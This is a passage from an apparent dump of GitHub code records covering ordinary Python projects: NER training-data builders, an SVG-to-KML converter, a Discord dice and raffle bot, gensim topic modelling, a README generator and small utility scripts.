else:\n class_idx = 4 # start-end ent\n else:\n class_idx = 0 # no ent\n one_hot_indicator[0, token_idx, class_idx] = 1.0\n return one_hot_indicator\n\n\ndef build_trainset_for_ner(data: Dict[int,\n Tuple[str, List[Tuple[str, int, int]]]],\n tokenizer: BertTokenizer, max_seq_len: int,\n entities: List[str]) \\\n -> Tuple[np.ndarray, List[np.ndarray]]:\n if 'O' in entities:\n err_msg = f'The entities list {entities} is wrong ' \\\n f'because it contains the `O` entity.'\n raise ValueError(err_msg)\n list_of_tokenized_texts = []\n list_of_ne_indicators = []\n max_seq_len_ = max_seq_len\n print(f'Number of texts is {len(data)}.')\n for cur_id in tqdm(sorted(list(data.keys()))):\n text, ners = data[cur_id]\n batch = sentenize_text_with_ners(\n s=text,\n tokenizer=tokenizer,\n ners=ners,\n ne_vocabulary=entities\n )\n for tokenized_text, ne_indicators in batch:\n list_of_tokenized_texts.append(tokenized_text)\n list_of_ne_indicators.append(ne_indicators)\n if len(tokenized_text) > max_seq_len_:\n max_seq_len_ = len(tokenized_text)\n print(f'Number of sentences is {len(list_of_tokenized_texts)}.')\n X = []\n y = [[] for _ in range(len(entities))]\n for tokenized_text, ne_indicators in zip(list_of_tokenized_texts,\n list_of_ne_indicators):\n ne_indicators_ = copy.copy(ne_indicators)\n while len(tokenized_text) < max_seq_len_:\n tokenized_text.append(tokenizer.pad_token)\n for ne_id in range(len(entities)):\n ne_indicators_[ne_id].append(0)\n X.append(tokenizer.convert_tokens_to_ids(tokenized_text))\n for ne_id in range(len(entities)):\n y[ne_id].append(\n transform_indicator_to_classmatrix(ne_indicators_[ne_id])\n )\n del ne_indicators_\n X = np.array(X, dtype=np.int32)\n y = [np.concatenate(cur, axis=0) for cur in y]\n if X.shape[1] == max_seq_len:\n return X, y\n indices_of_long_texts = []\n for sample_idx in range(X.shape[0]):\n is_padding = True\n for token_idx in range(max_seq_len, X.shape[1]):\n if X[sample_idx, token_idx] != tokenizer.pad_token_id:\n is_padding = False\n break\n if not is_padding:\n indices_of_long_texts.append(sample_idx)\n iteration = 1\n while len(indices_of_long_texts) > 0:\n print(f'Iter {iteration}: '\n f'there are {len(indices_of_long_texts)} very long texts!')\n new_X = np.full(\n shape=(len(indices_of_long_texts), max_seq_len_),\n fill_value=tokenizer.pad_token_id,\n dtype=np.int32\n )\n new_y = [np.zeros((len(indices_of_long_texts), max_seq_len_, 5),\n dtype=np.float32) for _ in range(len(y))]\n ndiff = max_seq_len_ - max_seq_len\n for local_idx, global_idx in enumerate(indices_of_long_texts):\n new_X[local_idx, 0:ndiff] = X[global_idx, max_seq_len:]\n X[global_idx, max_seq_len:] = tokenizer.pad_token_id\n for output_idx in range(len(y)):\n new_y[output_idx][local_idx, 0:ndiff, :] = \\\n y[output_idx][global_idx, max_seq_len:, :]\n y[output_idx][global_idx, max_seq_len:, :] = 0.0\n X = np.concatenate((X, new_X), axis=0)\n y = [np.concatenate((y[output_idx], new_y[output_idx]), axis=0)\n for output_idx in range(len(y))]\n indices_of_long_texts = []\n for sample_idx in range(X.shape[0]):\n is_padding = True\n for token_idx in range(max_seq_len, X.shape[1]):\n if X[sample_idx, token_idx] != tokenizer.pad_token_id:\n is_padding = False\n break\n if not is_padding:\n indices_of_long_texts.append(sample_idx)\n iteration += 1\n X = X[:, :max_seq_len]\n y = [cur[:, :max_seq_len, :] for cur in y]\n print(f'Number of sentences after cutting is {X.shape[0]}.')\n return X, y\n\n\ndef build_trainset_for_siam(data: Dict[int,\n Tuple[str, List[Tuple[str, int, int]]]],\n tokenizer: BertTokenizer, max_seq_len: int,\n entities: List[str], max_samples: int) \\\n -> Tuple[Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray],\n np.ndarray]:\n eps = 1e-6\n X, y = build_trainset_for_ner(data, tokenizer, max_seq_len, entities)\n entities_in_data = {'O': []}\n for sample_idx in range(X.shape[0]):\n start_pos = -1\n for token_idx in range(X.shape[1]):\n if X[sample_idx, token_idx] == tokenizer.pad_token_id:\n if start_pos >= 0:\n entities_in_data['O'].append(\n (\n sample_idx,\n (start_pos, token_idx)\n )\n )\n start_pos = -1\n break\n is_entity = False\n for ent_id in range(len(entities)):\n if y[ent_id][sample_idx, token_idx, 0] < eps:\n is_entity = True\n break\n if is_entity:\n if start_pos >= 0:\n entities_in_data['O'].append(\n (\n sample_idx,\n (start_pos, token_idx)\n )\n )\n start_pos = -1\n else:\n if start_pos < 0:\n start_pos = token_idx\n if start_pos >= 0:\n entities_in_data['O'].append(\n (\n sample_idx,\n (start_pos, X.shape[1])\n )\n )\n for ent_id, ent_type in enumerate(entities):\n entities_in_data[ent_type] = []\n for sample_idx in range(X.shape[0]):\n start_pos = -1\n for token_idx in range(X.shape[1]):\n if X[sample_idx, token_idx] == tokenizer.pad_token_id:\n if start_pos >= 0:\n entities_in_data[ent_type].append(\n (\n sample_idx,\n (start_pos, token_idx)\n )\n )\n start_pos = -1\n break\n if y[ent_id][sample_idx, token_idx, 0] >= eps:\n if start_pos >= 0:\n entities_in_data[ent_type].append(\n (\n sample_idx,\n (start_pos, token_idx)\n )\n )\n start_pos = -1\n else:\n if start_pos < 0:\n start_pos = token_idx\n if start_pos >= 0:\n entities_in_data[ent_type].append(\n (\n sample_idx,\n (start_pos, X.shape[1])\n )\n )\n del y\n used_pairs = set()\n X_left_tokens = np.empty((max_samples, max_seq_len), dtype=np.int32)\n X_left_masks = np.zeros((max_samples, max_seq_len), dtype=np.int32)\n X_right_tokens = np.empty((max_samples, max_seq_len), dtype=np.int32)\n X_right_masks = np.zeros((max_samples, max_seq_len), dtype=np.int32)\n y = np.empty((max_samples, 1), dtype=np.float32)\n entities_and_O = entities + ['O']\n counter = 0\n for _ in tqdm(range(max_samples)):\n first_entity = random.choice(entities_and_O)\n idx = entities_and_O.index(first_entity)\n if random.random() > 0.3:\n second_entity = random.choice(\n entities_and_O[:idx] + entities_and_O[(idx + 1):]\n )\n else:\n second_entity = first_entity\n first_sample = random.choice(entities_in_data[first_entity])\n second_sample = random.choice(entities_in_data[second_entity])\n while second_sample == first_sample:\n second_sample = random.choice(entities_in_data[second_entity])\n if (first_sample, second_sample) in used_pairs:\n for _ in range(100):\n first_sample = random.choice(entities_in_data[first_entity])\n second_sample = random.choice(entities_in_data[second_entity])\n while second_sample == first_sample:\n second_sample = random.choice(\n entities_in_data[second_entity]\n )\n if (first_sample, second_sample) in used_pairs:\n warn_msg = f'The pair {first_entity}-{second_entity} is not found.'\n warnings.warn(warn_msg)\n X_left_tokens[counter] = X[first_sample[0]]\n X_right_tokens[counter] = X[second_sample[0]]\n for token_idx in range(first_sample[1][0], first_sample[1][1]):\n X_left_masks[counter, token_idx] = 1\n for token_idx in range(second_sample[1][0], second_sample[1][1]):\n X_right_masks[counter, token_idx] = 1\n if first_entity == second_entity:\n y[counter, 0] = 1.0\n else:\n y[counter, 0] = 0.0\n counter += 1\n used_pairs.add((first_sample, second_sample))\n used_pairs.add((second_sample, first_sample))\n if counter < max_samples:\n print(f'{counter} samples from {max_samples} are built.')\n else:\n print(f'All {max_samples} samples are built.')\n del X\n X = (\n X_left_tokens[:counter],\n X_left_masks[:counter],\n X_right_tokens[:counter],\n X_right_masks[:counter]\n )\n return X, y[:counter]\n","repo_name":"bond005/runne_contrastive_ner","sub_path":"trainset_building/trainset_building.py","file_name":"trainset_building.py","file_ext":"py","file_size_in_byte":12156,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"45"} +{"seq_id":"18991966120","text":"import os\nfrom xml.dom import minidom\nfrom svg.path import parse_path\nimport matplotlib.pyplot as plt\nfrom shapely.geometry import Polygon\nfrom svgpathtools import Path\nimport geopandas as gpd\nfrom operator import itemgetter\nfrom kmlfaster import create_kml\n\n\ndef find_svg():\n svg_strings = []\n for file in os.listdir(\".\\\\input\"):\n if file.endswith(\".svg\"):\n print(os.path.join(\"\\\\input\", file))\n svg_strings.append(os.path.join(\"\\\\input\", file))\n return svg_strings\n\n\ndef get_rectangles(svg_doc):\n polygon_with_id = []\n polygons = []\n for irect, rect in enumerate(svg_doc.getElementsByTagName('rect')):\n x0 = float(rect.getAttribute('x'))\n y0 = float(rect.getAttribute('y'))\n id = rect.getAttribute('id')\n width = float(rect.getAttribute('width'))\n height = float(rect.getAttribute('height'))\n polygon = Polygon([(x0, y0),\n (x0 + width, y0),\n (x0 + width, y0 + height),\n (x0, y0 + height)\n ])\n polygons.append(polygon)\n polygon_with_id.append({\"id\": id, \"geometries\": polygon})\n return polygons, polygon_with_id\n\n\ndef get_paths(svg_doc):\n all_paths = []\n for ipath, path in enumerate(svg_doc.getElementsByTagName('path')):\n print('Path', ipath)\n d = path.getAttribute('d')\n id = path.getAttribute('id')\n print(id)\n parsed = parse_path(d)\n print('Objects:\\n', parsed, '\\n' + '-' * 20)\n circle_path = []\n for obj in parsed:\n bezier_path = Path(obj)\n num_samples = 10\n for i in range(num_samples):\n if i > 0:\n bezier = (bezier_path.point(i / (num_samples - 1)))\n if bezier is not None:\n circle_path.append(bezier)\n all_paths.append({\"id\": id, \"geometries\": circle_path})\n return all_paths\n\n\ndef attach_paths_to_polygon(whole_path, polygons):\n all_geometries = []\n for each_path in whole_path:\n circle = []\n for complex_num in each_path['geometries']:\n imaginary = complex_num.imag\n real = complex_num.real\n point = [float(real), float(imaginary)]\n circle.append(point)\n try:\n polygono = Polygon(circle)\n polygons.append({\"id\": each_path['id'], \"geometries\": polygono})\n all_geometries.append({\"id\": each_path['id'], \"geometries\": polygono})\n except:\n print(\"An exception occurred\")\n return polygons\n\n\ndef show_coords(polygons, factor):\n for polygon in polygons:\n x, y = polygon['geometries'].exterior.xy\n x_float = [float(line) for line in x]\n y_float = [float(line) for line in y]\n plt.plot(x_float, y_float, c=\"black\", linewidth=0.5)\n plt.xlim([0, 4 * 1000 / factor])\n plt.ylim([-4 * 1000 / factor, 0])\n return plt.show()\n\n\ndef determine_min(shape):\n test_list = []\n for each in shape:\n print(each['geometries'])\n test_list.append(each['geometries'])\n gpdf = gpd.GeoDataFrame(columns=['id', 'distance', 'feature'], geometry=[*test_list])\n bounds = gpdf.geometry.apply(lambda x: x.bounds).tolist()\n min_x, min_y, max_x, max_y = min(bounds, key=itemgetter(0))[0], min(bounds, key=itemgetter(1))[1], \\\n max(bounds, key=itemgetter(2))[2], max(bounds, key=itemgetter(3))[\n 3]\n print('This is the min tupel')\n print(min_x, min_y, max_x, max_y)\n return min_x, min_y, max_x, max_y\n\n\ndef shift_to_root(shape, diff_x, diff_y):\n all_geometries = []\n for i, polygons in enumerate(shape):\n xx, yy = polygons['geometries'].exterior.coords.xy\n x = xx.tolist()\n new_x = [each_x - diff_x for each_x in x]\n y = yy.tolist()\n new_y = [each_y - diff_y for each_y in y]\n poly = Polygon(zip(new_x, new_y))\n all_geometries.append({\"id\": polygons['id'], \"geometries\": poly})\n return all_geometries\n\n\ndef resize_polygons(list_of_poly, factor):\n all_geometries = []\n for i, polygons in enumerate(list_of_poly):\n xx, yy = polygons['geometries'].exterior.coords.xy\n x = xx.tolist()\n new_x = [each_x / factor for each_x in x]\n y = yy.tolist()\n new_y = [each_y / - factor for each_y in y]\n poly = Polygon(zip(new_x, new_y))\n all_geometries.append({\"id\": polygons['id'], \"geometries\": poly})\n return all_geometries\n\n\ndef get_working_dir():\n print(os.getcwd())\n path_to_wdir = os.getcwd()\n return path_to_wdir\n\n\ndef get_pixels(svg_doc):\n width = float(0)\n height = float(0)\n for isvg, svg in enumerate(svg_doc.getElementsByTagName('svg')):\n if isvg == 0:\n width = float(svg.getAttribute('width'))\n height = float(svg.getAttribute('height'))\n return width, height\n\n\ndef make_qlik_script(width, height, fac):\n script_string = f\"\"\"\nLet vScale = {fac};\nLet Breite = {width};\nLet Höhe = {height};\n\nLet Unten_Breite = -$(Höhe)/$(vScale);\nLet Links_Laenge = $(Breite)/$(vScale);\n\nLet vScale;\nLet Breite;\nLet Höhe;\n\"\"\"\n return script_string\n\n\ndef make_new_qlik_script():\n script_string = f\"\"\"\nmodified_1:\nLoad\n\tName,\n\tSubfield(Area, '],[')\t\t\t\t\t\t\t\tas all_coordinates\nResident [doc name/name2];\n\nmodified_2:\nLoad\n\tName,\n PurgeChar(Subfield(all_coordinates, ',', 1), '[')\tas x_Wert,\n PurgeChar(Subfield(all_coordinates, ',', 2), ']')\tas y_Wert\nResident modified_1;\n\nmax_min_table:\nLoad\n\tmax(replaced_x_Wert)\t\t\t\t\t\t\t\tas max_x_Wert,\n max(replaced_y_Wert)\t\t\t\t\t\t\t\tas max_y_Wert,\n min(replaced_x_Wert)\t\t\t\t\t\t\t\tas min_x_Wert,\n min(replaced_y_Wert)\t\t\t\t\t\t\t\tas min_y_Wert;\nLoad\n\tReplace(x_Wert, '.', ',')\t\t\t\t\t\t\tas replaced_x_Wert,\n Replace(y_Wert, '.', ',')\t\t\t\t\t\t\tas replaced_y_Wert\nResident modified_2;\n\nDrop Table modified_1;\n\n\nLet Oben_Breite = Peek('max_y_Wert', 0, 'max_min_table');\nLet Links_Laenge = Peek('min_x_Wert', 0, 'max_min_table');\nLet Unten_Breite = Peek('min_y_Wert', 0, 'max_min_table');\nLet Rechts_Laenge = Peek('max_x_Wert', 0, 'max_min_table');\n\"\"\"\n return script_string\n\n\n\"\"\"define factor\"\"\"\nfac = 1\n\ncwd = get_working_dir()\nos.environ['PROJ_LIB'] = f\"{cwd}\\\\venv\\\\Lib\\\\site-packages\\\\pyproj\\\\proj_dir\\\\share\\\\proj\"\nimport fiona\n\nall_svgs = find_svg()\n\nfiona.drvsupport.supported_drivers['LIBKML'] = 'rw'\n\nfor each in all_svgs:\n output_file_name = each[6:len(each)-4]\n doc = minidom.parse(f'.{each}')\n poly, polygon_with_id = get_rectangles(doc)\n new_added_path = get_paths(doc)\n pixels_width, pixels_height = get_pixels(doc)\n doc.unlink()\n new_poly = attach_paths_to_polygon(new_added_path, polygon_with_id)\n resized_poly = resize_polygons(new_poly, fac)\n minx, miny, maxx, maxy = determine_min(resized_poly)\n # new_polygons = shift_to_root(resized_poly, minx, maxy)\n new_polygons = resized_poly\n # insert_qlik_string = make_qlik_script(pixels_width, pixels_height, fac)\n insert_qlik_string = make_new_qlik_script()\n print(insert_qlik_string)\n # panda = gpd.GeoDataFrame(columns=['id', 'meta_x', 'meta_y'], geometry=[*new_polygons])\n # panda.to_file(f'.\\\\output{output_file_name}.kml', driver='LIBKML')\n # panda.to_file(f'.\\\\output{output_file_name}.geojson', driver=\"GeoJSON\")\n kml, kml_string = create_kml(new_polygons)\n with open(f'./output/{output_file_name}.kml', 'w') as f:\n f.write(kml_string)\n\nshow_coords(new_polygons, fac)\n","repo_name":"leitartuser/svg_to_kml","sub_path":"svg_to_kml.py","file_name":"svg_to_kml.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"43438834068","text":"# bot.py\nimport os\nimport discord\nfrom dotenv import load_dotenv\nimport asyncio\nimport random\nfrom logs import record\nfrom permissions import permission_level, add_user, get_info, change_permission, find_id_by_name\nfrom encryption import encrypt, decrypt\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nclient = discord.Client()\n\nversion = \"0.1\"\n\nclass Data:\n def __init__(self):\n self.event_active = False\n self.event_name = \"\"\n self.util_list = []\n \n \n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\n\n@client.event\nasync def on_message(message):\n '''\n This function handles all messages sent by users. \n First, the users permissions are determined.\n Next, the list of commands are run through and matched to the sent message.\n '''\n \n # We want to ignore messages sent by the bot itself.\n if message.author == client.user:\n return\n \n # Here the permissions of the user are determined. -1 indicates the user does not exist. \n level = permission_level(message.author.id)\n\n #If user does not exist, add them to permissions file\n if(level == -1):\n add_user({'name':message.author.name, 'level':0, 'id':message.author.id})\n \n # Following are all the commands.\n if message.content == '!version':\n await message.channel.send(version)\n return\n \n if message.content.startswith('!roll', 0, 5):\n min = 0\n max = 0\n if len(message.content) == 5:\n min = 0\n max = 100\n else: \n try:\n i = 6\n min_str = '' \n while(message.content[i] != ' '):\n min_str = min_str + message.content[i]\n i = i + 1\n \n max_str = message.content[i+1:]\n min = int(min_str)\n max = int(max_str)\n except:\n await message.channel.send('Roll Error, invalid min and max')\n return \n \n rand = random.randint(min, max)\n await message.channel.send(str(rand))\n record('roll by ' + message.author.name + '. Result = ' + str(rand))\n return\n \n if message.content.startswith('!raffle', 0, 7):\n try:\n print(message.content[8:])\n roll_time = int(message.content[8:])\n except:\n await message.channel.send('Raffle Error, invalid input time')\n return\n record(\"Raffle called with length of \" + str(roll_time))\n await message.channel.send('Raffle started! Apply with !apply. Raffle ends in ' + str(roll_time) + ' seconds')\n bot_data.event_name = \"raffle\"\n bot_data.event_active = True\n util_list = []\n await asyncio.sleep(roll_time)\n bot_data.event_name = \"\"\n bot_data.event_active = False\n util_list = []\n \n if(len(bot_data.util_list) == 0):\n await message.channel.send('Raffle closed due to lack of applicants')\n record(\"Raffle failed, lack of applicants\")\n else:\n choice = random.choice(bot_data.util_list)\n await message.channel.send('Raffle finished, congratulations ' + choice + '!')\n record(\"Raffle finished: winner = \" + choice)\n \n if message.content == \"!apply\" and bot_data.event_active == True and bot_data.event_name == \"raffle\":\n print(message.author.name + ' applied to raffle.')\n if(not message.author.name in bot_data.util_list):\n bot_data.util_list.append(message.author.name)\n \n if message.content.startswith('!perm', 0, 5) and level >= 1:\n try:\n l = 0\n search_name = ''\n if(len(message.content) != 5):\n search_name = message.content[6:]\n l = permission_level(find_id_by_name(search_name))\n else:\n search_name = message.author.name\n l = level \n if l == 2:\n await message.channel.send(search_name + ' is an admin')\n if l == 1:\n await message.channel.send(search_name + ' is a moderator')\n if l == 0:\n await message.channel.send(search_name + ' is a user')\n if l == -1:\n await message.channel.send(search_name + ' does not exist')\n except:\n print(\"search for permissions failed\")\n \n if message.content.startswith('!setPermissions', 0, 15) and level >= 1:\n try:\n search_name = ''\n i = 16\n while(message.content[i] != ' '):\n search_name = search_name + message.content[i] \n i = i + 1\n perms_arg = int(message.content[i+1:])\n if((perms_arg == 0 or perms_arg == 1 or perms_arg == 2) and level >= perms_arg):\n temp_dict = get_info(find_id_by_name(search_name))\n old_level = temp_dict['level']\n temp_dict['level'] = perms_arg\n change_permission(temp_dict)\n record(search_name + \" permission level changed from \" + str(old_level) + \" to \" + str(perms_arg))\n \n except:\n print(\"Changing permissions failed\")\n \n \nbot_data = Data()\nclient.run(TOKEN)\n\n","repo_name":"Oli-26/DiscordBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"70914232136","text":"''' epoch_test.py '''\nfrom src.train import train\n\nclass TestRNN:\n\n @staticmethod\n def test_one_epoch():\n val_loss = train(['--epoch=1', '--name=TEST'])\n assert round(val_loss, 7) == 1.6869721\n\n @staticmethod\n def test_epoch_resume():\n _ = train(['--epoch=2', '--name=TEST'])\n val_loss_end = train(['--epoch=2', '--checkpoint=TEST'])\n\n val_loss_test = train(['--epoch=4'])\n\n assert val_loss_test == val_loss_end\n","repo_name":"TylerYep/self-driving","sub_path":"unit_test/epoch_test.py","file_name":"epoch_test.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"36372795865","text":"import requests\n\nurl = \"https://api.ihansen.org/img/detail?page=0&perPage=9&index&orderBy=likes&favorites&tag=night\"\n\npayload={}\nheaders = {\n 'Cookie': 'userid=7b3d3d90a473456ebac473c28ce1d1e3'\n}\n\nresponse = requests.request(\"GET\", url, headers=headers, data=payload)\n\nprint(response.text)","repo_name":"zhangqinning/getWallpaper","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"42078111014","text":"def solution(brown, yellow):\n answer = []\n yellow_x, yellow_y = 0, 0\n\n for i in range(1, yellow + 1):\n if yellow % i == 0:\n yellow_x = yellow // i\n yellow_y = i\n\n if 2 * yellow_x + 2 * yellow_y + 4 == brown:\n answer.append(yellow_x + 2)\n answer.append(yellow_y + 2)\n break\n\n # answer리스트 내림차순 정렬\n return sorted(answer, reverse=True)","repo_name":"ChaeyeonHan/python-algorithm","sub_path":"programmers/카펫.py","file_name":"카펫.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"9907478267","text":"import xml.sax\nimport logging\nfrom pprint import pprint\nfrom gensim import corpora, models, similarities\nimport jieba\nimport codecs\nimport os\nimport pickle\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n#all_titles = []\n#all_files = []\n\nclass NewsHandler(xml.sax.ContentHandler):\n def __init__(self, all_files, all_titles):\n self.all_files = all_files\n self.all_titles = all_titles\n self.cur_tag = \"\"\n self.title = \"\"\n\n def startElement(self, tag, attributes):\n self.cur_tag = tag\n #print(\"<\" + tag + \">\")\n \n def endElement(self, tag):\n if tag == \"content\":\n self.cur_tag = \"\"\n self.title = \"\"\n #print(\"\")\n\n def characters(self, txt):\n txt = txt.strip()\n if len(txt) == 0: # 跳过内容为空的文章\n return\n\n # 只需要文章标题和文章内容\n if self.cur_tag == \"contenttitle\":\n self.title = txt\n elif self.cur_tag == \"content\":\n if self.title == \"\":\n return\n\n # 标题和内容必须同时添加,保持对应列表长度一致\n self.all_titles.append(self.title)\n self.all_files.append(txt)\n\n \nclass NewsCorpus(object):\n def __init__(self, filename=None, stopwords=None):\n self.dictionary = None\n self.corpus = None\n self.all_files = []\n self.all_titles = []\n\n if filename != None:\n self.parseXML(filename)\n stoplist = None\n if stopwords != None:\n f = codecs.open(stopwords, 'r', encoding='utf8')\n stoplist = f.read().split()\n f.close()\n\n self.bowCorpus(stoplist)\n\n def __iter__(self):\n for text in self.corpus:\n yield text\n\n def __len__(self):\n print(\"__len__() call!\", len(self.corpus))\n return len(self.corpus)\n\n def __getitem__(self, key):\n print(\"!!! __getitem__() called!!!, key=\", key)\n\n def parseXML(self, xmlfile, encoding='utf8'):\n f = codecs.open(xmlfile, 'r', encoding)\n xml.sax.parseString(f.read().replace('&', '&'), NewsHandler(self.all_files, self.all_titles))\n\n def bowCorpus(self, stoplist=None):\n for i in range(len(self.all_files)):\n afile = list(jieba.cut(self.all_files[i]))\n filtered = [x for x in afile if x not in stoplist]\n self.all_files[i] = filtered\n\n self.dictionary = corpora.Dictionary(self.all_files)\n self.corpus = [self.dictionary.doc2bow(text) for text in self.all_files]\n\n def save(self):\n if self.dictionary != None and self.corpus != None:\n self.dictionary.save('my_corpus.dict')\n corpora.MmCorpus.serialize('my_corpus.mm', self.corpus)\n f = open('my_corpus.titles', 'wb')\n pickle.dump(self.all_titles, f)\n f.close()\n\n def load(self):\n dict_file = 'my_corpus.dict'\n mm_file = 'my_corpus.mm'\n title_file = 'my_corpus.titles'\n if os.path.exists(dict_file) and os.path.exists(mm_file) and os.path.exists(title_file):\n self.dictionary = corpora.Dictionary.load(dict_file)\n self.corpus = corpora.MmCorpus(mm_file)\n f = open(title_file, 'rb')\n self.all_titles = pickle.load(f)\n f.close()\n else:\n print('**error**: dict or corpus file NOT found!')\n\n\n#mycorpus = NewsCorpus(\"news_tensite_xml.dat\", \"stopwords.txt\")\n#mycorpus.save()\nmycorpus = NewsCorpus()\nmycorpus.load()\n\n#print(mycorpus.dictionary)\n#print(mycorpus.corpus)\n#print(mycorpus.all_titles)\nprint(\"all titles len:\", len(mycorpus.all_titles))\n\nprint(\"!!parse() ok.\")\n\n#for id, afile in enumerate(mycorpus):\n #print(id, afile)\n\nprint(\"length of mycorpus:\", len(mycorpus))\n\ntfidf = models.TfidfModel(mycorpus)\nprint(tfidf)\ntfidf_corpus = tfidf[mycorpus]\n\nprint(\"begin lda training\")\n\nlda = models.LdaModel(tfidf_corpus, id2word=mycorpus.dictionary, num_topics=20)\n#lda = models.LdaModel(tfidf_corpus, num_topics=10)\nprint()\nprint('-------------------------------------')\nlda.print_topics()\nprint()\nprint('======================================')\nlda_corpus = lda[tfidf_corpus]\ncorpora.MmCorpus.serialize('lda_corpus.mm', lda_corpus)\n#for topic in topic_test:\n #print(topic)\n","repo_name":"kent-wong/NLP","sub_path":"news_topics.py","file_name":"news_topics.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"25693299412","text":"\"\"\"\nCreate README.md file\n\nUsage:\n python print_markdown.py\n\n\"\"\"\nimport subprocess\nimport pytz\n\nfrom itertools import groupby\nfrom datetime import datetime\n\nfrom file_utils import Quiz, create_node, create_quizzes, get_valid_path\n\nPATH_LIST = sorted(get_valid_path(\".\"))\nNODE_LIST = [create_node(p) for p in PATH_LIST]\nQUIZ_LIST = sorted(\n create_quizzes(NODE_LIST), key=lambda q: (q.year, q.month, q.subject))\n\nMARKDOWN_HEADER = \"\"\"\n
    \n\"Logo\"\n
    \n\n# R Korea Weekly Quiz\n![Generate README](https://github.com/R-Korea/weekly_R_quiz/workflows/Generate%20README/badge.svg)\n\nR Korea에서 진행한 주말맞이 R Quiz 모음입니다.\n\"\"\"\n\nSEOUL_TZ = pytz.timezone(\"Asia/Seoul\")\n# For example, it would render \"2020-07-24 11:08:35 (Asia/Seoul)\".\nNOW = datetime.now().astimezone(SEOUL_TZ).strftime(\"%Y-%m-%d %H:%M:%S (Asia/Seoul)\")\n\nMARKDOWN_FOOTER = f\"\"\"\n## NOTES\n이 파일은 {NOW} 자동으로 생성되었습니다.\n\n## 생성 방법\n### Python\n\n```shell\npipenv install # install dependencies\npipenv run python utils/print_markdown.py\n```\n\"\"\"\n\n\ndef print_year(year: int) -> str:\n \"\"\"Returns `year` in markdown format\"\"\"\n return f\"## {year} 년\"\n\n\ndef print_month(month: int) -> str:\n \"\"\"Returns `month` in markdown format\"\"\"\n return f\"### {month} 월\"\n\n\ndef print_image(quiz: Quiz) -> str:\n \"\"\"Returns \"\"\"\n if not quiz.image_path:\n return \"\"\n\n template = f\"\"\"\n
    \n \"Quiz\n
    \n\"\"\"\n return template\n\n\ndef print_question(quiz: Quiz) -> str:\n \"\"\"Returns a link to the question in markdown format\"\"\"\n template = f\"[{quiz.subject}]({quiz.quiz_path})\"\n return template\n\n\ndef print_answer(quiz: Quiz) -> str:\n \"\"\"Returns a link to the question answer\"\"\"\n if not quiz.answer_path:\n return \"\"\n\n template = f\"\"\"
    정답 보기\"\"\"\n return template\n\n\ndef print_quiz(quiz: Quiz) -> str:\n \"\"\"Returns a quiz in markdown format\"\"\"\n subject = quiz.subject\n\n link = f\"\"\"\n문제 바로 가기\n\"\"\"\n\n with open(quiz.quiz_path, \"r\") as f:\n question = f.readline().strip()\n\n image_tag = print_image(quiz)\n answer_tag = print_answer(quiz)\n\n template = f\"\"\"
    {subject}\n {link}\n
    {question}
    \n {image_tag}\n{answer_tag}\n
    \n\"\"\"\n\n return template\n\n\ndef get_markdown() -> str:\n \"\"\"Returns a complete markdown\"\"\"\n md_buffer = \"\"\n\n for year, y_group in groupby(QUIZ_LIST, key=lambda q: q.year):\n\n md_buffer += print_year(year) + \"\\n\"\n for month, group in groupby(y_group, key=lambda q: q.month):\n\n md_buffer += print_month(month) + \"\\n\"\n\n for node in group:\n md_buffer += print_quiz(node) + \"\\n\"\n\n return md_buffer\n\n\ndef clean_toc(toc: str) -> str:\n \"\"\"Each line in `toc` has 6 unnecessary spaces, so get rid of them\"\"\"\n lines = toc.splitlines()\n return \"\\n\".join(line[6:] for line in lines)\n\n\ndef main():\n \"\"\"Main Function\"\"\"\n buffer = get_markdown()\n result = subprocess.run(\n [\"./utils/gh-md-toc\", \"-\", \"$0\"],\n stdout=subprocess.PIPE,\n input=buffer.encode(\"utf-8\"))\n\n toc = result.stdout.decode('utf-8')\n toc = clean_toc(toc)\n\n markdown = f\"\"\"{MARKDOWN_HEADER}\n\nTable of Contents\n=======================\n\n{toc}\n\n{buffer}\n\n{MARKDOWN_FOOTER}\n\"\"\"\n\n with open(\"README.md\", \"w\") as f:\n f.write(markdown)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"R-Korea/weekly_R_quiz","sub_path":"utils/print_markdown.py","file_name":"print_markdown.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"45"} +{"seq_id":"20607133496","text":"import json\nimport sys\nimport os\n\nsys_arg = sys.argv[1]\n\ndef retrieve_values(obj, key):\n array = []\n search_val = key\n def retrieve(obj, key):\n if isinstance(obj, dict):\n for key, val in obj.items():\n if isinstance(val, (dict, list)):\n retrieve(val, key)\n elif val == search_val:\n print(json.dumps(obj, indent=4) + '\\n')\n array.append(val)\n elif isinstance(obj, list):\n for item in obj:\n retrieve(item, key)\n #print(obj, '\\n')\n return array\n results = retrieve(obj, key)\n\n if len(array) == 0: \n print(\"Dead End! Maybe an invalid selector.\")\n return results\n\ndef retrieve_file(obj):\n json_file_path = obj \n with open(json_file_path, 'r') as json_file:\n data = json.load(json_file)\n return data\n\ndef search():\n selector = input(\"Input CSS3 selector: \")\n \n if not selector[0].isalpha():\n updated_sel = selector[:0] + '' + selector[1:]\n else:\n updated_sel = selector\n\n complete_path = os.path.abspath(sys_arg)\n json_file = retrieve_file(complete_path)\n retrieve_values(json_file, updated_sel)\n\ndef main():\n if len(sys.argv) == 2:\n try: \n input_file = open(sys_arg, 'r')\n file_content = 